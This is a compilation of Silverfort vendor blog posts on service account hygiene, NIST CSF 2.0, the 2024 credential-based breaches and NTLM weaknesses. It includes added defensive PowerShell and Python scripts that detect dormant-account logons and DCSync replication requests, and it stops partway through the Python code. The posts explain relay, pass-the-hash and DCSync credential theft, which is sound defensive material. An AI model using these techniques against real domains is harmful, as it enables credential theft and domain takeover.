Good information system hygiene practices and the principle of "least privilege" considerably reduce the means by which attackers can obtain service account credentials and misuse them for malicious purposes. Naming conventions should therefore be followed to clearly identify which accounts are actually service accounts and distinguish them from ordinary human access, and their privileges should then be analysed to ensure they are appropriate to their mission. However, even these simple measures can be difficult to implement retroactively for the oldest accounts, sometimes described as "legacy". Most will have been created before any naming convention was established. In the largest companies there are probably hundreds or even thousands of them, so an analysis and clean-up project would prove extremely time-consuming.

In such information systems, it is rarely known where the service accounts are, what function they perform, what their password is, and so on. They continue to operate in the background, sometimes for decades, unbeknownst to IT managers. ANSSI requires that each service account be reserved for the automatic process for which it was created, and therefore that it not be diverted to other purposes. When performing critical tasks, administrators generally go through either a dedicated privileged access workstation (PAW) or a bastion host through which their actions are monitored and recorded. In theory, no user is allowed to access sensitive resources from an ordinary account: any attempt would be rejected.

However, the means that Active Directory natively offers to limit the privileges of the various service accounts are difficult to implement, and the opacity surrounding their day-to-day activity creates risks when drawing up access policies (GPOs). If a policy were, for example, to prevent one of these accounts from accessing a resource, it could cause the failure of the often critical process that depends on it. Service accounts therefore often escape the restrictions that apply to human administrator accounts (PAW, bastion...), leaving the door open to their misuse by unscrupulous administrators or attackers. Where that happens, few means exist to monitor their actions and ensure they do not introduce vulnerabilities into the system. Finally, regarding passwords, Microsoft now provides the means to create "group managed" service accounts (gMSA) with regular password changes. However, some limits remain: service accounts operating on systems other than Windows (notably Unix/Linux) are not compatible, and some accounts will have a hard-coded password that cannot be changed.

To summarise, ANSSI wants entities covered by NIS2 to secure their service accounts by ensuring:

- that they are used exclusively for the process for which they were created;
- that they are disabled as soon as they are no longer needed;
- that their passwords are changed regularly;
- that their privileges are proportionate to their mission.

Unfortunately, for each of these requirements, limitations in terms of visibility quickly lead to difficulties in implementing these measures. Where that is the case, ANSSI requires that appropriate controls be implemented to mitigate the resulting risks.

### How Silverfort secures service accounts

Silverfort's technology makes it possible to identify and secure service accounts quickly and effectively. To resolve the difficulties related to visibility and traceability of access, Silverfort sits behind Active Directory (as well as other compatible directories), consolidating and monitoring every authentication within the information system. Within a few weeks, we are thus able to identify when an account operates in a predictable and repetitive manner, the hallmark of a service account. We label them, quickly providing a complete inventory of all the organisation's service accounts, including those that do not follow the naming convention. We also identify "hybrid" accounts: those that look like a machine account but whose behaviour spontaneously deviates from the norm, a sign that they are also used by humans; and conversely, named administrator accounts from which automatic processes operate. Finally, we bring to light all the sources from which these accounts authenticate, as well as their destination(s). This comes with a risk score to highlight accounts that access sensitive resources, have excessive privileges, or whose password has not been changed in a long time. The platform thus provides greater visibility to identity and security teams. In less than a month, they will have at their disposal a complete list of accounts that violate ANSSI's recommendations, which they can prioritise in their risk reduction efforts. Beyond hygiene, Silverfort also offers formidable tools for securing this machine access.

By monitoring authentications in real time, our platform can alert the SOC as soon as a service account deviates from its usual behaviour. In addition, Silverfort can put granular access controls in place on these accounts, far more simply and surgically than the policies that can be configured in Active Directory. We give the responsible teams the means to configure precisely which sources and destinations are allowed for each service account, and also to restrict their permissions according to specific parameters. In this way, we can block any attempt to divert a service account beyond the functions for which it was created. If a...

---
- Published: 2024-09-25
- Modified: 2024-09-25
- URL: https://www.silverfort.com/blog/service-account-security-why-automation-is-the-key-to-effective-enforcement/

Cybersecurity starts with one major principle: "You cannot protect what you don't know". This is true for assets like endpoints, servers, etc., but it also applies to accounts. Ask yourself these questions right now: do you know which accounts exist in your environment, and do you know what they do in your network? On top of that, do you control what these accounts do, and how do you manage security enforcement on them? In recent posts, we've discussed the different risks that human and non-human identities (NHIs) bring to an organization. In this blog, we will focus on the challenge of scaling the management and protection of a large number of NHIs in an environment by leveraging automation and security policies. We’ll discover why automating service account security is essential for enterprises to enhance protection, streamline management, and reduce risk.

### Protecting Non-Human Identities

When discussing accounts, it’s not just about user accounts that represent human users but also non-human identities.
User accounts are, on the face of it, easy to manage, as they belong to a real-life person who uses the account to authenticate to services and resources. Additional security layers can be added to the account, like password rotation policies, account lockout thresholds, MFA validation, etc.

A Non-Human Identity (NHI) is a general term for an account used by a machine (or application, service, automation, etc.) to perform non-interactive authentication in which no human user is involved. We refer to these as service accounts (Active Directory) or service principals (Entra ID).

Although service accounts tend to have a distinct usage pattern, securing them brings its own challenges. Every service running in the organization might need one or more service accounts, so protection needs to be at scale. Protecting service accounts boils down to a few key aspects:

- Visibility: do you have a clear overview of all accounts?
- Purpose: do you know why they exist in the environment?
- Behavior: can you verify and validate usage?
- Privileges: can you validate and guard the permissions of an account?
- Attack Detection: can you protect against specific service account-based attacks?
- Security management: do you have clear protection capabilities for all your accounts?

### A step back in time: Managed Service Accounts

Managed Service Accounts (MSAs) are specialized managed domain accounts in Active Directory designed to provide a higher level of security, such as automated password management and simplified service account management. Standalone Managed Service Accounts (sMSAs) are used for individual services on a single server and cannot be shared across multiple servers. Group Managed Service Accounts (gMSAs), on the other hand, are designed for use by multiple servers in an environment, such as when a service is provided through a load balancer.
[Code block in the original post: example of a group-managed service account]

Overall, gMSAs enhance security, simplify account management, and reduce the operational complexity associated with service accounts in enterprise environments. However, not all service accounts are suitable to be MSAs, and managing MSAs poses its own challenges, such as ensuring correct application configuration and understanding the domain prerequisites (a KDS root key, Windows Server 2012 or later domain controllers, and applications able to run under a gMSA). Many of the challenges of managing regular service accounts also apply to MSAs, and so do several attack techniques; a gMSA whose password can be retrieved by every domain computer, for example, is little better than a static password. So there is room for further enhancements that identity teams and security teams can benefit from.

Challenge of Automating and Scaling Service Account Protection

When embarking on the quest to have complete control over your service accounts' activities and protection, a new challenge quickly arises: how do you properly manage these accounts? Here are the key challenges we continue to face with service account management:

- Number of service accounts: the number of accounts in an organization can rise quickly, especially service accounts. Every service or application needs specific access to other resources and, following best practice, uses a dedicated service account for each of them. A good example is the number of service principals in a Microsoft Entra ID environment.
- Multiple team responsibilities: most of the time, the team managing and configuring the applications is neither the team in charge of the identity provider nor the security team. As a result, application teams, security teams, identity teams and others need to work together to properly secure the service accounts.
- Account lifecycle: service accounts grow with the number of services, and as mentioned above, they can be generated automatically.
This makes it hard for an identity administrator to keep track of all accounts and make sure new accounts are correctly secured. Applications and services are decommissioned and removed from the environment, but cleaning up the related service accounts is often forgotten, leaving orphaned accounts that pose a security risk.
- Visibility and documentation: service accounts are often poorly documented, which makes applying security policies on top of them a challenge. Account owners are also poorly documented, which leads to 'dangling owners' when people leave the organization.

To deal with the challenges of scaling service account protection, organizations need efficient and clearer management capabilities for service accounts to strengthen their security posture.

Scaling Service Account Protection Policies in Silverfort

Silverfort Service Account Protection provides an overview of all your service accounts in a single place, monitors their activity in your environment and enforces protection policies. To address the challenge of scaling your service account policies, Silverfort provides several mechanisms to keep control over your service account security protection layer. In this section, we briefly touch upon these capabilities.

Service Account Categorization

Silverfort's service account detection engine detects service accounts based on authentication behavior patterns and sorts them into categories, including M2M (machine-to-machine) accounts, hybrid accounts, scanners and dormant accounts. Classification is the first step towards identifying which accounts are machine-based and in use. The engine also detects interactive usage, new accounts, broadly used accounts, etc. All this information helps in the initial triage of the accounts, ready to be protected by a security policy.
Silverfort leverages the best practices an organization already uses to manage service accounts, which helps the engine not only with categorization but also with detection. Implementing best practices for service account usage gives you a head start in getting your security policies in place, so it should always be top of mind when dealing with service account protection.

In nearly all environments, numerous accounts exhibit mixed behavior patterns, function in a hybrid manner, suffer from misconfigurations, or remain legacy accounts. These accounts require the attention of the identity team. Categorization is the first step in getting the focus right.

Silverfort and Managed Service Accounts

Microsoft offers MSAs to help with the management and security of service accounts. They provide automatic password management, simplified service principal name (SPN) management, and the ability to delegate management to other administrators. One of the key security measures is that they are not allowed interactive logon, since they are intended for non-interactive use by services and applications. Combined with Silverfort's service account protection policy capabilities, the security posture of gMSAs is further enhanced while keeping the simplicity of managing them through Active Directory.

[Screenshot in the original post: filtering for gMSA accounts only in the Silverfort service accounts screen]

Silverfort supports gMSAs under the service account protection policy. These accounts are classified as machine-to-machine, and all the capabilities available on the platform are applied to them. Each gMSA is detected and treated the same as any other service account, so all features, including service account policies, apply to the gMSAs in the environment.

Smart Policies: Your Way into Automated Service Account Protection

To ease the management of security policies, we recently introduced our Smart Policy capability.
A Smart Policy enables you to automatically protect entire logical groupings of service accounts based on their activity profile. The Smart Policy runs in cycles, scanning service accounts for baseline changes, and defines the service account protection policy accordingly. This change is automatic and dynamic, without any need for manual intervention.

If an account's behavior remains consistent for a defined period, the policy automatically enforces a security layer on top of the account, and Silverfort protects against any authentication deviating from the known baseline behavior.

With a Smart Policy, Silverfort enhances the resilience of stable and consistent service accounts, allowing you to focus on the more complex and dynamic ones. Service account policies are automatically enforced based on your configuration settings, enhancing the security posture of your service accounts with minimal administrative effort while still maintaining a clear overview.

Integration with the Service Account Policy API

A different approach to more automated and consistent service account policy management is building an automated correlation between Silverfort's Service Account Policy and a third-party service. This can be established through Silverfort integrations, for example by using Silverfort's Service Account Protection app in ServiceNow (see below). Service Account Protection Policy integrations use our Service Account Policy API, which allows full control over the service account security policies. As discussed earlier, part of these security policies can be fully automated using Smart Policies. Others might need additional information or instructions to be effective. From the automation perspective, all of this can be read and controlled via the API. The capabilities exposed through the API are numerous: you could leverage it inside a playbook, for example, or perform your own API interactions in response to third-party events.
Integration with a CMDB (Configuration Management Database)

A CMDB is often used to map an organization's complete infrastructure in one place and provide a single system of record about the environment. It consolidates and maintains a combined set of complex data coming from different sources. A single location like a CMDB, where this kind of information is live and queryable, is a very valuable asset for every department of a company.

One of the key components of a CMDB is an overview of running applications and services, including software versions, hardware mapping, communication flows and ownership. The CMDB contains a vast amount of data on what keeps a service or application running. In the context of service account protection, Silverfort is interested in the service account information that the CMDB relates to each service or application. Correlating the service account data with the application data in a CMDB allows Silverfort to enhance the NHI security posture.

Not only can the CMDB act as the single source of truth; by leveraging Silverfort's service account detection capabilities, Silverfort can also provide a validation mechanism and become one of the data sources for the CMDB's data completeness and consistency. For example, this could help an organization detect active accounts that are not documented anywhere in the CMDB.

Example: ServiceNow CMDB

Seeing the need for automated and scalable service account protection capabilities, Silverfort developed a ServiceNow application that specifically focuses on combining ServiceNow CMDB data with the Silverfort Service Account Policy. The integration delivers automated enforcement of our Service Account Policy capabilities without any interaction by security admins. This happens in real time, based on CMDB application and service data.
By using the Silverfort service account protection application on your ServiceNow CMDB instance, you enable:

- Scalability: scale service account protection by leveraging the CMDB as a single source of truth and enforce service account protection policies in real time.
- Team collaboration: use the integration for easy cross-team collaboration on security enforcement. Application teams updating CMDB application information adjust the security policies for these applications without any manual intervention by security teams.
- Minimizing human error: mistakes are easily made by humans, far less so by automation. Changes in the source data are reflected immediately in the corresponding policies, with the right data in the right spot.

The integration can be installed through the ServiceNow Store.

Conclusion

Scaling non-human identity protection successfully depends on the consistency and quality of service account behavior. Silverfort's automated behavior detection, categorization and Smart Policy enforcement make the initial step towards a...

--- - Published: 2024-09-18 - Modified: 2024-11-25 - URL: https://www.silverfort.com/blog/how-silverfort-can-help-organizations-align-with-nists-cybersecurity-framework-version-2-0/

Applying security controls across an organization's environment must be a top priority for every organization, regardless of its size, sector, or maturity. To help guide organizations in managing and reducing their cybersecurity risks, the National Institute of Standards and Technology (NIST) created a framework that provides guidelines for managing and mitigating cybersecurity risk. In this article, you will learn about the latest version of the NIST Cybersecurity Framework, version 2.0, and how Silverfort can help organizations align with its identity security aspects.

What is the NIST Cybersecurity Framework 2.0?

The NIST Cybersecurity Framework (CSF) was originally released in 2014 by the National Institute of Standards and Technology; version 2.0 was published in February 2024. The framework sets out principles and best practices that, although first written with critical infrastructure and government in mind, apply to organizations of every sector. CSF 2.0 consists of six core functions: Govern, Identify, Protect, Detect, Respond and Recover. These functions are essential to every organization's approach to managing cybersecurity risk; they are designed to be implemented continuously and dynamically, providing a strategic view of how an organization manages that risk. Let's focus on the identity security aspects of NIST CSF 2.0.

The Identity Security Aspects of the NIST CSF 2.0

With the identity attack landscape continuously evolving, organizations have become increasingly concerned about their identity security. Through the compromise of user credentials, attackers gain access to critical resources, which lets them conduct lateral movement and ransomware attacks. To address the importance of identity security, NIST CSF 2.0 provides the following guidance:

Asset Management (ID.AM)
Organizations must identify and manage all their assets, including data, software, hardware, systems and people, based on their importance to business objectives and the risk management strategy:
- Organizations should manage and maintain all types of users, including human, machine-to-machine and non-human identities.
- Organizations should record all user authentication activity in their environment and detect who is accessing which resources, as well as which authentication protocols are being used.

Risk Assessment (ID.RA)
Organizations must understand all the cybersecurity risks that might affect their environment, including all assets and users:
- Organizations should identify and record all internal and external threats, as well as vulnerabilities that could be exploited.
- All potential security risks must be prioritized, including inherent risks.

Identity Management, Authentication, and Access Control (PR.AA)
To minimize the risk of unauthorized access, only identified users may access the organization's physical and logical assets:
- Organizations should manage all identities and credentials for authorized users, services and on-prem resources.
- All authentications in the organization's environment are made by identified users and services, including service accounts.
- Organizations should define and manage security policies for user access permissions and authorizations in accordance with the principle of least privilege.

Continuous Monitoring (DE.CM)
Organizations should implement continuous monitoring to detect anomalies and potentially adverse events, including:
- User activity and authentication
- Access logs to resources
- Third-party user activities

Incident Analysis (RS.AN) and Mitigation (RS.MI)
To minimize the effects of incidents and ensure effective response, organizations should investigate all incidents and carry out recovery activities:
- Organizations should analyze the root cause of any security incident to gain full visibility into the attack flow and its consequences.
- Organizations should contain and eradicate all security incidents.

Getting NIST CSF 2.0 Compliant with Silverfort

1. Asset Management (ID.AM)
With Silverfort you get an in-depth identity inventory that displays the types of users and resources in your environment, as well as the weaknesses in your security.
With continuous visibility and actionable insights into everything identity-related, Silverfort allows you to take a more proactive approach to identity security posture management with just a few clicks.

2. Risk Assessment (ID.RA)
Silverfort's risk assessment provides a comprehensive overview of an organization's identity security posture. It includes real-time visibility into all access attempts across your environments and runs a real-time risk analysis to calculate a risk score for each authentication request. If unauthorized or abnormal behavior is identified, the system can take immediate action, such as terminating the session or requesting additional authentication. The risk assessment also uncovers security hygiene issues that can expose the environment to identity threats, while detecting any active threats already underway. With this information in hand, organizations can easily identify the identity security gaps that need to be mitigated to align with NIST's risk assessment requirements.

3. Continuous Monitoring (DE.CM)
Silverfort provides centralized visibility into every authentication and access request across all users and resources in the hybrid environment, thanks to its native integrations with the identity providers. Silverfort's analysis engine determines the risk of every authentication, so organizations can detect and respond to potential security threats in real time, including blocking the access of any account that displays anomalous behavior.

4. Identity Management, Authentication, and Access Control (PR.AA)
Silverfort enables organizations to enforce user access policies in real time, so only authorized users and devices can gain access to the resources assigned to them.
By applying Silverfort access policies, organizations can enforce security controls across their user base, with policies defined by user role, risk indicators, and organizational security requirements. Depending on the policy, the outcome for the users it covers can be an alert, an MFA prompt, or a block. Silverfort can block access requests for every type of user, service account, access method, and resource in real time, effectively preventing unauthorized access.

5. Incident Analysis (RS.AN) and Mitigation (RS.MI)
All authentication and access attempts are monitored and analyzed continuously by Silverfort, including the source, destination, risk level, and much more. In addition, you can apply access policies, configured either by yourself or by Silverfort, that notify you when an access attempt deviates from normal behavior and/or deny access. Silverfort can assist you in containing, investigating, and recovering compromised accounts if you experience a security incident.

Want to learn more about how Silverfort can help you address the identity security aspects of NIST CSF 2.0? Schedule a call with one of our experts or fill out this form for a pricing quote.

--- - Published: 2024-08-29 - Modified: 2024-10-09 - URL: https://www.silverfort.com/blog/keeping-up-with-the-credentials-the-evolving-landscape-of-ransomware-in-2024/

The first half of 2024 has seen some of the largest breaches in recent years. Their common denominator? Compromised credentials and a lack of MFA. The most prominent breach to date is the Snowflake breach, which has continuously affected some major organizations since May. In this article, we'll focus on some of the hardest hit organizations, and round up with a different, though just as preventable, breach.
Snowflake: The Supply Chain is Only as Strong as Its Weakest Link

One of the most notable breaches of 2024 so far is the one that targeted the cloud data platform Snowflake. In fact, the target wasn't Snowflake itself, but rather Snowflake's customers, including AT&T, Ticketmaster, Santander Bank and Neiman Marcus, among others. As reported by several cyber news outlets, this was a textbook supply chain attack. Attackers gained access to Snowflake customers' instances using credentials harvested from compromised machines, in many cases by infostealer malware delivered through phishing emails and malicious attachments. It is estimated that more than 500 credentials were obtained this way and put up for sale on the dark web, including usernames, passwords, and the URLs of the Snowflake environments associated with those credentials. According to Wired, in some cases the attackers used a compromised machine of a Snowflake employee or contractor as their initial point of entry. In other cases, the credentials had been stolen and sold as early as 2020 and were still valid in 2024.

Snowflake's Investigation Findings

The investigation conducted by Snowflake and Mandiant found that at least 79.7% of the accounts used by the attackers had been compromised years prior to the current attack and that their passwords were never changed or rotated. The investigation also confirmed that hundreds of credentials of Snowflake customers had been exposed since 2020, and that the impacted instances did not have network policies in place to only allow access from trusted locations. The investigation also found that the attackers obtained credentials and used them to access demo accounts of a former Snowflake employee. "This appears to be a targeted campaign directed at users with single-factor authentication", confirmed Brad Jones, Snowflake's CISO, in a statement issued by Snowflake, adding that the demo account "did not contain sensitive data".
Jones further stated that the "access was possible because the demo account was not behind Okta or MFA", and that "demo accounts are not connected to Snowflake's production or corporate systems". He also announced that Snowflake is "developing a plan to require our customers to implement advanced security controls, like MFA or network policies, especially for privileged Snowflake customer accounts".

AT&T: Flake It till You Make It

Approximately 110 million AT&T customers' phone numbers and call records were obtained through an AT&T Snowflake account. This information included the number of calls and texts customers made, to which destination, and the duration of each call. This means the data also included information on non-AT&T customers who were on the other end of the call or text. The data was not leaked or made public, and according to some reports this was because AT&T allegedly paid $370,000 in ransom after negotiating with the attacker.

It's been a rough year for AT&T. Only four months before the Snowflake breach, a database of more than 70 million AT&T customers was leaked online, revealing names, addresses, phone numbers, social security numbers, and birth dates. According to reports, the database was stolen in 2021 and held by the attacker mostly intact until March of this year, when it was released in its entirety.

Ticketmaster: Another Flake in the Blizzard

In May, data on 560 million Ticketmaster users was reported to have been stolen. In July, the company sent emails to its customers notifying them that an unauthorized user had obtained information "from an isolated cloud database hosted by a third-party data services provider", and that the information "may have included your name, basic contact information, and payment card information such as encrypted credit or debit card numbers and expiration dates". The BBC reported that it had asked Ticketmaster why it took so long to notify its customers, but did not receive a response.
Change Healthcare (UnitedHealth Group): A Lesson in Identity Hygiene

In February, a ransomware attack on Change Healthcare resulted in the theft of 4TB of sensitive data on up to 1 in 3 Americans, as well as widespread outages at hospitals, pharmacies, and healthcare practices throughout the United States. Although UnitedHealth Group (UHG) paid ALPHV/BlackCat, the ransomware group that claimed responsibility for the attack, a $22 million ransom to ensure the data would be deleted, the group allegedly passed the stolen data to another group, RansomHub, which demanded another ransom.

In his testimony before the House Energy and Commerce Committee, UHG CEO Andrew Witty confirmed that the attackers accessed the network through a remote access server (a Citrix portal) that didn't have MFA. The attackers either purchased credentials on the dark web or used brute force to gain initial access. Either way, MFA would have stopped them. Once they gained access to the network, they moved laterally from one machine to another, and we all know how that ended.

https://www.youtube.com/watch?v=vjQAcWy1_dQ&t=912s

Mitigation Best Practices

There are certain precautions organizations can take to mitigate and contain such breaches, namely ITDR (Identity Threat Detection and Response) and ISPM (Identity Security Posture Management). Gady Svahjman, Global Threat Hunting Lead at Silverfort, offers some expert advice:

Detection

The attackers most probably used the stolen credentials differently from the legitimate user: at different times, from different source geolocations, and between different source and target machines. Had detections and security attributes for abnormal authentications been implemented, the breaches could have been detected and an alert triggered. Accounts that have been unused for a long period of time but whose credentials suddenly authenticate, or accounts whose passwords never expire, should also have raised a red flag.
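As an added example, not code from the original post or from Silverfort's product: the two red flags just named, written as PowerShell checks against Active Directory and a domain controller's Security log. The first lists enabled accounts whose password never expires (and how stale that password is); the second looks for successful logons (event 4624) by accounts that AD had not seen for a configurable number of days, which is exactly the "dormant account that suddenly authenticates" pattern. It assumes the ActiveDirectory RSAT module, Event Log Readers rights on the DC, and the placeholder DC name DC01.

```powershell
# Added example (not from the original post): two of the red flags named above,
# found with the ActiveDirectory module and the Security event log.
#   1. Enabled accounts whose password never expires, and when it was last set.
#   2. Accounts dormant for $DormantDays that suddenly produce a successful logon (4624).
# Requires RSAT ActiveDirectory; reading the Security log needs Event Log Readers rights.
Import-Module ActiveDirectory

function Get-NeverExpiringAccounts {
    param([int]$MaxPasswordAgeDays = 365)
    $cutoff = (Get-Date).AddDays(-$MaxPasswordAgeDays)
    Get-ADUser -Filter { Enabled -eq $true -and PasswordNeverExpires -eq $true } `
        -Properties PasswordLastSet, LastLogonDate, ServicePrincipalName, AdminCount |
    ForEach-Object {
        [pscustomobject]@{
            SamAccountName  = $_.SamAccountName
            PasswordLastSet = $_.PasswordLastSet
            StalePassword   = ($null -eq $_.PasswordLastSet) -or ($_.PasswordLastSet -lt $cutoff)
            LastLogonDate   = $_.LastLogonDate
            HasSPN          = ($_.ServicePrincipalName.Count -gt 0)   # likely a service account
            Privileged      = ($_.AdminCount -eq 1)                    # protected-group member, past or present
        }
    } | Sort-Object PasswordLastSet
}

function Get-DormantAccountLogons {
    param([int]$DormantDays = 90, [int]$LookbackHours = 24, [string]$ComputerName = $env:COMPUTERNAME)
    $dormantCutoff = (Get-Date).AddDays(-$DormantDays)

    # LastLogonDate is the replicated lastLogonTimestamp (accurate to ~14 days),
    # which is good enough for a 90-day dormancy test. Build a lookup of dormant accounts.
    $dormant = @{}
    Get-ADUser -Filter { Enabled -eq $true } -Properties LastLogonDate |
        Where-Object { $null -eq $_.LastLogonDate -or $_.LastLogonDate -lt $dormantCutoff } |
        ForEach-Object { $dormant[$_.SamAccountName.ToLower()] = $_.LastLogonDate }

    # 4624 = successful logon. In its event schema, property 5 = TargetUserName,
    # 8 = LogonType, 18 = IpAddress.
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4624
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    } | ForEach-Object {
        $user = $_.Properties[5].Value.ToString().ToLower()
        if ($dormant.ContainsKey($user)) {
            [pscustomobject]@{
                TimeCreated  = $_.TimeCreated
                Account      = $user
                LastSeenInAD = $dormant[$user]
                LogonType    = $_.Properties[8].Value    # 3 = network, 10 = RDP, 2 = interactive
                SourceIp     = $_.Properties[18].Value
            }
        }
    }
}

# Usage: point at a domain controller, since domain-account logon events land there.
Get-NeverExpiringAccounts | Where-Object { $_.StalePassword -or $_.Privileged } | Format-Table -AutoSize
Get-DormantAccountLogons -ComputerName 'DC01' | Format-Table -AutoSize
```

Run the dormant-logon check on a schedule and any hit is worth a ticket on its own: a legitimate owner returning after 90 days is rare, and an attacker replaying credentials bought years ago (as in the Snowflake cases above) looks exactly like this.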
Proper risk indicators and access policies would trigger an alert in such cases.

Prevention

Detection alone isn't enough, and organizations shouldn't rely exclusively on alerts. Reviewing thousands of alerts every day is not sustainable, and retrospective detection is not sufficient. Access policies could have denied access based on behavioral and pattern analysis. The lack of MFA was a crucial factor in allowing the attackers to reach these Snowflake instances and the Change Healthcare network. By requiring more than one factor to authenticate, strong MFA controls could have stopped the attackers: the legitimate user credentials alone would not have been enough, as the attackers would have had to get past an extra layer of security.

Response

Raising walls: to contain the attack and freeze the situation once it is discovered, the first security principle to implement is policies that deny any access not necessary for critical business operations. Containing compromised accounts and machines may involve denying access to machines and accounts completely or only partially, for example by allowing only specified sources and destinations to reach critical infrastructure. When in doubt about whether a user account has been compromised, or whether the organization should allow that user to continue working, resetting the user's password and enforcing a policy that allows that account to operate only with MFA is another option instead of denying access.

Final Thoughts

It may be uncomfortable to admit, but these breaches could have been prevented, or at least the damage kept to a minimum. All that needed to be done was to update passwords, enable MFA, and set access policies. This may sound easy enough, but it's not always so straightforward. For example, organizations that contract with third parties and use accounts managed by those third parties have very limited ability to check the accounts' permissions, or even whether they are still alive and active.
From discovery to containment, identity security is a cycle. Coordination and unification are required, as well as a constant effort to stay on top of things. These breaches didn't just expose credit card numbers, personal medical information and call records of millions of customers; they exposed how little we know about, and are committed to, identity security compared to how critical it really is.

--- - Published: 2024-08-15 - Modified: 2024-08-15 - URL: https://www.silverfort.com/blog/understanding-the-security-risks-of-ntlm/

In October 2023, Microsoft made a pivotal announcement that signaled the beginning of the end for NTLM, including all its versions. This decision, reiterated in June 2024, underscores Microsoft's commitment to moving developers to more secure protocols, such as Kerberos via the Negotiate mechanism. With the deprecation process set to start in early 2025 and complete by 2027, NTLM's long reign is ending. Despite its historical significance, NTLM now represents a considerable security liability. This blog explores the critical weaknesses inherent to NTLM, the reasons behind its prolonged use, and the necessary transition to more secure authentication protocols. Understanding these elements is essential for organizations to safeguard their systems and data.

Microsoft Announcement

Microsoft announced in October 2023 its intention to deprecate all versions of NTLM, including LANMAN, NTLMv1, and NTLMv2. This decision was reaffirmed in June 2024, emphasizing that NTLM is no longer under active development and urging developers to transition to more secure protocols like Kerberos via the Negotiate mechanism. The deprecation process is set to begin in early 2025, with phased reductions in support throughout the year. By mid-2026, NTLM will no longer be available in new installations of Microsoft's operating systems (whether it can still be enabled through advanced settings is unverified).
Full deprecation, including the removal of legacy support, is expected to be complete by the end of 2027.

NTLM is a Security Risk

Today, NTLM poses significant security risks due to outdated cryptographic methods and well-documented weaknesses. NTLM also lacks modern security features such as multi-factor authentication (MFA) and server identity validation: there is no mutual authentication, so the client never verifies who it is talking to. Because of these weaknesses, attackers can exploit NTLM to gain unauthorized access to sensitive resources like databases and internal applications, making it a major liability.

The oldest variants, LM and NTLMv1, are challenge-response exchanges in which the server sends an 8-byte challenge and the client encrypts it with DES keys derived directly from the password hash. There is no client contribution to the exchange and no key agreement; the response depends only on the hash and the server challenge. A captured exchange therefore contains everything an attacker needs to crack the password offline, and an NTLMv1 response can even be reduced to recovering the NT hash itself with precomputed tables.

To address these shortcomings, NTLMv2 adds a client challenge and a timestamp and replaces DES with HMAC-MD5. NTLMv2 can therefore be viewed as "nonce-enhanced": the client-supplied randomness defeats precomputed tables and makes offline cracking depend on password strength, but it does nothing for how password hashes are stored, and it does not stop an attacker who already holds the hash from using it. Nor does it prevent relay attacks: nothing in NTLM binds the authentication to the server the client intended to reach, so a man-in-the-middle can forward the client's response to another service unless that service enforces session signing or Extended Protection for Authentication (channel binding).

The Prevalence of NTLM: A Legacy's Last Stand

Despite its many known vulnerabilities, NTLM has held its ground like an old warrior who refuses to retire. NTLM's persistence is not random. In the late 1990s and early 2000s, a wave of legacy applications was born, often tailored to their organizations' unique needs. As time marched on, many of these applications were abandoned by their creators. They were left without updates or support, yet they remained essential to countless enterprises.
NTLM, with its simple and universally implemented authentication mechanism, became the lifeline for these legacy systems. It provided the compatibility they needed to function in a world that had long moved on to newer, more secure protocols like Kerberos. For many organizations, replacing these critical systems was daunting. The migration to modern authentication protocols was not just a technical challenge but a costly and complex endeavor, requiring extensive reworking of infrastructure and application code.

As the enterprise landscape evolved, so did its IT infrastructure. New systems were introduced, and with them came the need to maintain trust relationships in multi-domain environments. NTLM, despite its age, proved to be a reliable bridge, ensuring operational continuity and administrative convenience. Gradual upgrades became the norm, and NTLM was often kept as a fallback, a safety net for when newer protocols stumbled (Kerberos needs a reachable KDC and a registered SPN for the target; when either is missing, Negotiate silently falls back to NTLM). Yet security analysts knew that NTLM's weaknesses made it a prime target: pass-the-hash, relay and brute-force attacks are all too familiar with NTLM. This reliance on NTLM is a tale of survival in a rapidly changing digital world, a delicate dance between innovation and legacy.

It is worth mentioning that NTLM is not a standalone network protocol but an embedded authentication scheme: it is carried inside other protocols, such as SMB/CIFS for file sharing, MS-RPC, HTTP (the WWW-Authenticate: NTLM scheme) and RDP (through CredSSP and Network Level Authentication). That versatility is exactly what made it so pervasive, and it is why reducing its use means touching every one of those surfaces.

Why NTLM Still Reigns: Legacy Compatibility, Operational Necessities, and Security Considerations

The high costs and complexities associated with upgrading or rewriting legacy systems account for much of the persistence of NTLM.
Furthermore, NTLM continues to be used despite the availability of more modern authentication protocols because infrastructure upgrades are gradual and because organizations rely on non-Windows systems and third parties. Some of the key elements are:

Compatibility and legacy systems:

- Legacy systems and applications were designed to work with NTLM.
- Rewriting or upgrading these systems can be costly and complex.
- Some non-Windows systems and applications still rely on NTLM.
- Organizations often upgrade their IT infrastructure incrementally.

Security controls and vendor support:

- Certain third-party vendors may only support NTLM.
- Organizations enhance NTLM with security controls such as MFA and monitoring.
- NTLM is used in specific cases such as remote access.
- Maintaining operational continuity often prevails over adopting new technology.

### Understanding Password Syncing Challenges and SaaS Risks

On the server side, password hashes are stored in the NTDS.dit file on each domain controller (DC). However, these hashes are susceptible to DCSync attacks, a technique in which malicious software masquerades as a legitimate DC. Using this technique, attackers can trick the DC into syncing its database of password hashes with rogue software such as Mimikatz. This allows the attacker to harvest a complete set of credential hashes from the domain controller, which can then be used for domain takeover.

Figure: Example from the Mimikatz console, executing lsadump for dcsync. The lsadump command is used to extract sensitive information such as passwords and hashes from the Local Security Authority (LSA) secrets.

This is particularly dangerous for SaaS environments synchronized with on-premises Active Directory (AD) via cloud Identity Providers (IdPs) such as Azure AD. Stolen hashes can be used to authenticate to SaaS applications without cracking passwords, by leveraging the synced AD integration.
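Because DCSync asks a DC for replication data, it leaves a trace that defenders can watch: a Windows Security event 4662 on the domain naming context whose properties carry the directory replication control-access rights, requested by an account that is not a DC or a legitimate sync service. The detection below is an added example written for this post, not Silverfort's code; the event records, the account names and the allow-list (including a hypothetical Azure AD Connect sync account, which does replicate legitimately for password hash sync) are constructed for the demo, while the three replication-right GUIDs are the standard Active Directory values.

```python
import re

# Control-access rights that a replication request carries in the 4662 'Properties' field.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: DC computer accounts and the AD Connect sync
# account. Constructed names for the demo; build the real list from your DCs.
ALLOWED_REPLICATORS = {"DC01$", "DC02$", "MSOL_a1b2c3d4"}

# Constructed 4662 records in the shape the Security log renders them.
SAMPLE_4662 = [
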